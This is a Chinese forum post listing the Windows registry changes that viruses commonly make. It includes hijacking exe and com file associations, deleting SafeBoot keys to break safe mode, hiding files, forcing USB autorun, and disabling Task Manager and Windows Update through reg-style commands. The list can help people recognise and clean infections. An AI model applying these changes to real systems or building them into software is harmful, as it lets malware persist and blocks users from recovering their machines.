微信扫一扫 分享朋友圈

已有 2744 人浏览分享

开启左侧

病毒常见的修改注册表的方法

[复制链接]
2744 0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareServer = 0修改com和exe文件的文件关联指向病毒文件:
HKLM\SOFTWARE\Classes\comfile\shell\open\command\: "病毒文件"%1" %*"
HKLM\SOFTWARE\Classes\exefile\shell\open\command\: "病毒文件"%1" %*"
删除组策略限制:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer
破坏安全模式 删除:
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
破坏显示系统文件:
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
把REG_SZ, "x"值填充垃圾数据
修改注册表 保证U盘自动运行:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDriveTypeAutoRun修改为 REG_DWORD, 189
禁用windows自动更新:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
禁用任务管理器 添加:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
破坏显示隐藏文件 删除:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /fadd
您需要登录后才可以回帖 登录 | 注册

本版积分规则

0

关注

21

粉丝

4

主题
精彩推荐
热门资讯
网友晒图
图文推荐
  • 微信公众平台

  • 扫描访问手机版

  • QQ: 455494158

    客服电话

    上海:189-1713-1515 北京:189-1196-2030

    电子邮件

    chenuany@126.com

    在线时间:8:00-21:00